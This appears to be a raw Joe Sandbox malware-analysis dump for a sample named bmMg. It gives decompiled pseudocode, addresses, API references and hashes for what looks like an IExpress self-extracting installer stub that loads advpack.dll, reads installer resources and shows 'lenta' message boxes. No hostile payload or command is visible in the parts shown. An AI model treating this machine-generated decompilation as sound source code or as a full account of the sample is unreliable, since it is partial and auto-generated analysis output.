                                                                      0x00f837f0
                                                                      0x00f837f6
                                                                      0x00f83805
                                                                      0x00f83817
                                                                      0x00f8382b
                                                                      0x00f83830
                                                                      0x00f83836
                                                                      0x00f8383b
                                                                      0x00f8383d
                                                                      0x00f838eb
                                                                      0x00f838eb
                                                                      0x00f838f2
                                                                      0x00f8390c
                                                                      0x00f83911
                                                                      0x00f83911
                                                                      0x00f83913
                                                                      0x00f8394d
                                                                      0x00f8394d
                                                                      0x00f8394f
                                                                      0x00f838a9
                                                                      0x00f838a9
                                                                      0x00f838b0
                                                                      0x00f838b2
                                                                      0x00f838b9
                                                                      0x00f838bb
                                                                      0x00f838c1
                                                                      0x00f83975
                                                                      0x00f838c7
                                                                      0x00f838de
                                                                      0x00f838e0
                                                                      0x00f838e0
                                                                      0x00f8397b
                                                                      0x00f8397d
                                                                      0x00f839a9
                                                                      0x00f8397f
                                                                      0x00f83982
                                                                      0x00f8398b
                                                                      0x00f8398d
                                                                      0x00f8398f
                                                                      0x00f8399f
                                                                      0x00f839a1
                                                                      0x00f83991
                                                                      0x00f83991
                                                                      0x00f83991
                                                                      0x00f8398f
                                                                      0x00f839af
                                                                      0x00f839b6
                                                                      0x00f83a0f
                                                                      0x00f83a0f
                                                                      0x00f83a11
                                                                      0x00f83a13
                                                                      0x00f83a19
                                                                      0x00000000
                                                                      0x00f839b8
                                                                      0x00f839b8
                                                                      0x00f839ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f839bc
                                                                      0x00f839bf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f839c3
                                                                      0x00f839c9
                                                                      0x00f839ce
                                                                      0x00f839d0
                                                                      0x00f839e3
                                                                      0x00f839e5
                                                                      0x00f839e6
                                                                      0x00f839f1
                                                                      0x00f839f7
                                                                      0x00f839fa
                                                                      0x00f83a01
                                                                      0x00f83a04
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83a06
                                                                      0x00f83a09
                                                                      0x00f83a09
                                                                      0x00f83a0b
                                                                      0x00f83a0b
                                                                      0x00000000
                                                                      0x00f83a09
                                                                      0x00f839fc
                                                                      0x00000000
                                                                      0x00f839fc
                                                                      0x00f839d3
                                                                      0x00f839d8
                                                                      0x00f839da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f839dc
                                                                      0x00f839b6
                                                                      0x00f83955
                                                                      0x00f8395b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83961
                                                                      0x00f83963
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83969
                                                                      0x00f83969
                                                                      0x00000000
                                                                      0x00f83969
                                                                      0x00f83915
                                                                      0x00f83915
                                                                      0x00f8391b
                                                                      0x00f8391f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8392d
                                                                      0x00f83933
                                                                      0x00f83938
                                                                      0x00f8393a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83940
                                                                      0x00f83946
                                                                      0x00f8394b
                                                                      0x00000000
                                                                      0x00f8394b
                                                                      0x00000000
                                                                      0x00f838f2
                                                                      0x00f83843
                                                                      0x00f83845
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8384b
                                                                      0x00f8384d
                                                                      0x00f83883
                                                                      0x00f83885
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8389a
                                                                      0x00f8389e
                                                                      0x00f8389e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f838a0
                                                                      0x00f838a0
                                                                      0x00f838a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f838a4
                                                                      0x00000000
                                                                      0x00f838a4
                                                                      0x00f8384f
                                                                      0x00f83851
                                                                      0x00f83857
                                                                      0x00f8386e
                                                                      0x00f83877
                                                                      0x00f8387b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83881
                                                                      0x00f83859
                                                                      0x00f8385c
                                                                      0x00f83862
                                                                      0x00f83866
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83868
                                                                      0x00000000
                                                                      0x00f838f4
                                                                      0x00f838f4
                                                                      0x00f838f5
                                                                      0x00f838fb
                                                                      0x00f83901
                                                                      0x00f83901
                                                                      0x00000000
                                                                      0x00f8390a
                                                                      0x00f8374b
                                                                      0x00f8374e
                                                                      0x00f8375c
                                                                      0x00f83764
                                                                      0x00f83769
                                                                      0x00f8376e
                                                                      0x00f83771
                                                                      0x00f8379c
                                                                      0x00f8379f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f837a3
                                                                      0x00f837a4
                                                                      0x00000000
                                                                      0x00f837a4
                                                                      0x00f83773
                                                                      0x00f83777
                                                                      0x00f83778
                                                                      0x00f8377f
                                                                      0x00f83781
                                                                      0x00f8378e
                                                                      0x00f8378e
                                                                      0x00f83794
                                                                      0x00000000
                                                                      0x00f83794
                                                                      0x00f83783
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83785
                                                                      0x00f8378c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8378c
                                                                      0x00f83750
                                                                      0x00000000
                                                                      0x00f8372d
                                                                      0x00f8372d
                                                                      0x00f8396b
                                                                      0x00f8396b
                                                                      0x00f8396c
                                                                      0x00f8396e
                                                                      0x00f8396f
                                                                      0x00f83a1e
                                                                      0x00f83a1e
                                                                      0x00f83a22
                                                                      0x00f83a27
                                                                      0x00f83a3e
                                                                      0x00f83a3e

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F83723
                                                                      • MessageBeep.USER32(00000000), ref: 00F839C3
                                                                      • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00F839F1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Message$BeepVersion
                                                                      • String ID: 3$lenta
                                                                      • API String ID: 2519184315-4216304122
                                                                      • Opcode ID: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                      • Instruction ID: a84a42f266a296e942f95631901a245c3bf68cd370f64b860fa3b22ee86448d4
                                                                      • Opcode Fuzzy Hash: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                      • Instruction Fuzzy Hash: 8991E472F052249BDB38AA14CC817FA77A1EB45B14F1500A9D88997261DB788F81FB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00F86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				signed int _t9;
                                                                      				signed char _t14;
                                                                      				struct HINSTANCE__* _t15;
                                                                      				void* _t18;
                                                                      				CHAR* _t26;
                                                                      				void* _t27;
                                                                      				signed int _t28;
                                                                      
                                                                      				_t27 = __esi;
                                                                      				_t18 = __ebx;
                                                                      				_t9 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t9 ^ _t28;
                                                                      				_push(__ecx);
                                                                      				E00F81781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      				_t26 = "advpack.dll";
                                                                      				E00F8658A( &_v268, 0x104, _t26);
                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                      					_t15 = LoadLibraryA(_t26);
                                                                      				} else {
                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                      				}
                                                                      				return E00F86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                      			}













                                                                      0x00f86495
                                                                      0x00f86495
                                                                      0x00f864a0
                                                                      0x00f864a7
                                                                      0x00f864ab
                                                                      0x00f864bd
                                                                      0x00f864c2
                                                                      0x00f864d3
                                                                      0x00f864df
                                                                      0x00f864e8
                                                                      0x00f86502
                                                                      0x00f864ee
                                                                      0x00f864f9
                                                                      0x00f864f9
                                                                      0x00f86516

                                                                      APIs
                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864DF
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864F9
                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F86502
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AttributesFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                      • API String ID: 438848745-3761280616
                                                                      • Opcode ID: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                      • Instruction ID: 422cb36fd2efdf1091799ef5b672aea7aa096302c1fd9b6d11b27a741f173b45
                                                                      • Opcode Fuzzy Hash: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                      • Instruction Fuzzy Hash: 5E01D130A04108ABEB10FB64DC49AFE7778EB50310F50029AF585D61C0DFB4AE8AAB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                      				void* _v8;
                                                                      				char* _v12;
                                                                      				intOrPtr _v16;
                                                                      				void* _v20;
                                                                      				intOrPtr _v24;
                                                                      				int _v28;
                                                                      				int _v32;
                                                                      				void* _v36;
                                                                      				int _v40;
                                                                      				void* _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				long _t68;
                                                                      				void* _t70;
                                                                      				void* _t73;
                                                                      				void* _t79;
                                                                      				void* _t83;
                                                                      				void* _t87;
                                                                      				void* _t88;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr _t99;
                                                                      				int _t101;
                                                                      				void* _t103;
                                                                      				void* _t106;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      
                                                                      				_v12 = __edx;
                                                                      				_t99 = __ecx;
                                                                      				_t106 = 0;
                                                                      				_v16 = __ecx;
                                                                      				_t87 = 0;
                                                                      				_t103 = 0;
                                                                      				_v20 = 0;
                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                      					L19:
                                                                      					_t106 = 1;
                                                                      				} else {
                                                                      					_t62 = 0;
                                                                      					_v8 = 0;
                                                                      					while(1) {
                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                      						if(E00F82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                      							goto L20;
                                                                      						}
                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                      						_v28 = _t68;
                                                                      						if(_t68 == 0) {
                                                                      							_t99 = _v16;
                                                                      							_t70 = _v8 + _t99;
                                                                      							_t93 = _v24;
                                                                      							_t87 = _v20;
                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                      								goto L18;
                                                                      							}
                                                                      						} else {
                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                      							if(_t103 != 0) {
                                                                      								_t73 = GlobalLock(_t103);
                                                                      								_v36 = _t73;
                                                                      								if(_t73 != 0) {
                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                      										L15:
                                                                      										GlobalUnlock(_t103);
                                                                      										_t99 = _v16;
                                                                      										L18:
                                                                      										_t87 = _t87 + 1;
                                                                      										_t62 = _v8 + 0x3c;
                                                                      										_v20 = _t87;
                                                                      										_v8 = _v8 + 0x3c;
                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                      											continue;
                                                                      										} else {
                                                                      											goto L19;
                                                                      										}
                                                                      									} else {
                                                                      										_t79 = _v44;
                                                                      										_t88 = _t106;
                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                      										_t101 = _v28;
                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                      										_t97 = _v48;
                                                                      										_v36 = _t83;
                                                                      										_t109 = _t83;
                                                                      										do {
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                      											_t109 = _t109 + 0x18;
                                                                      											_t88 = _t88 + 4;
                                                                      										} while (_t88 < 8);
                                                                      										_t87 = _v20;
                                                                      										_t106 = 0;
                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                      												GlobalUnlock(_t103);
                                                                      											} else {
                                                                      												goto L15;
                                                                      											}
                                                                      										} else {
                                                                      											goto L15;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      				}
                                                                      				L20:
                                                                      				 *_a8 = _t87;
                                                                      				if(_t103 != 0) {
                                                                      					GlobalFree(_t103);
                                                                      				}
                                                                      				return _t106;
                                                                      			}

































                                                                      0x00f828f1
                                                                      0x00f828f4
                                                                      0x00f828f7
                                                                      0x00f828f9
                                                                      0x00f828fc
                                                                      0x00f828ff
                                                                      0x00f82901
                                                                      0x00f82907
                                                                      0x00f82a62
                                                                      0x00f82a64
                                                                      0x00f8290d
                                                                      0x00f8290d
                                                                      0x00f8290f
                                                                      0x00f82912
                                                                      0x00f82920
                                                                      0x00f82937
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82944
                                                                      0x00f8294a
                                                                      0x00f8294f
                                                                      0x00f82a2f
                                                                      0x00f82a32
                                                                      0x00f82a34
                                                                      0x00f82a37
                                                                      0x00f82a41
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82955
                                                                      0x00f8295e
                                                                      0x00f82962
                                                                      0x00f82969
                                                                      0x00f8296f
                                                                      0x00f82974
                                                                      0x00f8298c
                                                                      0x00f82a20
                                                                      0x00f82a21
                                                                      0x00f82a27
                                                                      0x00f82a4c
                                                                      0x00f82a4f
                                                                      0x00f82a50
                                                                      0x00f82a53
                                                                      0x00f82a56
                                                                      0x00f82a5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f829b2
                                                                      0x00f829b2
                                                                      0x00f829b5
                                                                      0x00f829bd
                                                                      0x00f829c3
                                                                      0x00f829cc
                                                                      0x00f829d5
                                                                      0x00f829d7
                                                                      0x00f829da
                                                                      0x00f829dd
                                                                      0x00f829df
                                                                      0x00f829ec
                                                                      0x00f829f8
                                                                      0x00f829fc
                                                                      0x00f829ff
                                                                      0x00f82a02
                                                                      0x00f82a07
                                                                      0x00f82a0a
                                                                      0x00f82a0f
                                                                      0x00f82a19
                                                                      0x00f82a81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82a0f
                                                                      0x00f8298c
                                                                      0x00f82974
                                                                      0x00f82962
                                                                      0x00000000
                                                                      0x00f8294f
                                                                      0x00f82912
                                                                      0x00f82a65
                                                                      0x00f82a68
                                                                      0x00f82a6c
                                                                      0x00f82a6f
                                                                      0x00f82a6f
                                                                      0x00f82a7d

                                                                      APIs
                                                                      • GlobalFree.KERNEL32 ref: 00F82A6F
                                                                        • Part of subcall function 00F82773: CharUpperA.USER32(644C7055,00000000,00000000,00000000), ref: 00F827A8
                                                                        • Part of subcall function 00F82773: CharNextA.USER32(0000054D), ref: 00F827B5
                                                                        • Part of subcall function 00F82773: CharNextA.USER32(00000000), ref: 00F827BC
                                                                        • Part of subcall function 00F82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                        • Part of subcall function 00F82773: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                        • Part of subcall function 00F82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                        • Part of subcall function 00F82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005), ref: 00F82958
                                                                      • GlobalLock.KERNEL32 ref: 00F82969
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005,?), ref: 00F82A21
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00F82A81
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3949799724-0
                                                                      • Opcode ID: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                      • Instruction ID: 7199bdf0d8b76b11d604cbb09567959cc1db4374a21e72e45db5e0f3d68654ca
                                                                      • Opcode Fuzzy Hash: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                      • Instruction Fuzzy Hash: 83511731E00219DBDB65EF98C884AEEFBB5FF48710F14416AE905E3211DB39A941EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 32%
                                                                      			E00F84169(void* __eflags) {
                                                                      				int _t18;
                                                                      				void* _t21;
                                                                      
                                                                      				_t20 = E00F8468F("FINISHMSG", 0, 0);
                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                      				if(_t21 != 0) {
                                                                      					if(E00F8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                      							L7:
                                                                      							return LocalFree(_t21);
                                                                      						}
                                                                      						_push(0);
                                                                      						_push(0x40);
                                                                      						_push(0);
                                                                      						_push(_t21);
                                                                      						_t18 = 0x3e9;
                                                                      						L6:
                                                                      						E00F844B9(0, _t18);
                                                                      						goto L7;
                                                                      					}
                                                                      					_push(0);
                                                                      					_push(0x10);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_t18 = 0x4b1;
                                                                      					goto L6;
                                                                      				}
                                                                      				return E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      			}





                                                                      0x00f8417d
                                                                      0x00f8418f
                                                                      0x00f84193
                                                                      0x00f841b7
                                                                      0x00f841d3
                                                                      0x00f841e6
                                                                      0x00000000
                                                                      0x00f841e7
                                                                      0x00f841d5
                                                                      0x00f841d6
                                                                      0x00f841d8
                                                                      0x00f841d9
                                                                      0x00f841da
                                                                      0x00f841df
                                                                      0x00f841e1
                                                                      0x00000000
                                                                      0x00f841e1
                                                                      0x00f841b9
                                                                      0x00f841ba
                                                                      0x00f841bc
                                                                      0x00f841bd
                                                                      0x00f841be
                                                                      0x00000000
                                                                      0x00f841be
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F84189
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F841E7
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$FINISHMSG
                                                                      • API String ID: 3507850446-3091758298
                                                                      • Opcode ID: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                      • Instruction ID: 7c3926e369d0412d9f3d01b02b4c6005726a317d1cbe4c0f99adba1cf497fadb
                                                                      • Opcode Fuzzy Hash: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                      • Instruction Fuzzy Hash: 5501F4B270061A7BF72576654C8AFFB718EEBD47A5F104126B705E1180DA6CEC017375
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v520;
                                                                      				void* __esi;
                                                                      				signed int _t11;
                                                                      				void* _t14;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      				struct HWND__* _t34;
                                                                      				signed int _t35;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t27 = __ebx;
                                                                      				_t11 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t11 ^ _t35;
                                                                      				_t34 = _a4;
                                                                      				_t14 = _a8 - 0x110;
                                                                      				if(_t14 == 0) {
                                                                      					_t32 = GetDesktopWindow();
                                                                      					E00F843D0(_t34, _t15);
                                                                      					_v520 = 0;
                                                                      					LoadStringA( *0xf89a3c, _a16,  &_v520, 0x200);
                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                      					MessageBeep(0xffffffff);
                                                                      					goto L6;
                                                                      				} else {
                                                                      					if(_t14 != 1) {
                                                                      						L4:
                                                                      						_t23 = 0;
                                                                      					} else {
                                                                      						_t32 = _a12;
                                                                      						if(_t32 - 0x83d > 1) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							EndDialog(_t34, _t32);
                                                                      							L6:
                                                                      							_t23 = 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                      			}













                                                                      0x00f819e0
                                                                      0x00f819e0
                                                                      0x00f819eb
                                                                      0x00f819f2
                                                                      0x00f819f9
                                                                      0x00f819fc
                                                                      0x00f81a01
                                                                      0x00f81a2a
                                                                      0x00f81a2e
                                                                      0x00f81a3e
                                                                      0x00f81a4f
                                                                      0x00f81a62
                                                                      0x00f81a6a
                                                                      0x00000000
                                                                      0x00f81a03
                                                                      0x00f81a06
                                                                      0x00f81a20
                                                                      0x00f81a20
                                                                      0x00f81a08
                                                                      0x00f81a08
                                                                      0x00f81a14
                                                                      0x00000000
                                                                      0x00f81a16
                                                                      0x00f81a18
                                                                      0x00f81a70
                                                                      0x00f81a72
                                                                      0x00f81a72
                                                                      0x00f81a14
                                                                      0x00f81a06
                                                                      0x00f81a81

                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 00F81A18
                                                                      • GetDesktopWindow.USER32 ref: 00F81A24
                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00F81A4F
                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00F81A62
                                                                      • MessageBeep.USER32(000000FF), ref: 00F81A6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1273765764-0
                                                                      • Opcode ID: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                      • Instruction ID: 728c2fc31c5987c2fc8373e8d54faa30cb4d805b32f67f0ffb9b1a6be94f2d0a
                                                                      • Opcode Fuzzy Hash: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                      • Instruction Fuzzy Hash: DC11CE3150010DABDB04EF64DD48AFE77B8FB09310F108255F92292190DA349E02FB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F87155() {
                                                                      				void* _v8;
                                                                      				struct _FILETIME _v16;
                                                                      				signed int _v20;
                                                                      				union _LARGE_INTEGER _v24;
                                                                      				signed int _t23;
                                                                      				signed int _t36;
                                                                      				signed int _t37;
                                                                      				signed int _t39;
                                                                      
                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                      				_t23 =  *0xf88004; // 0x644c7055
                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
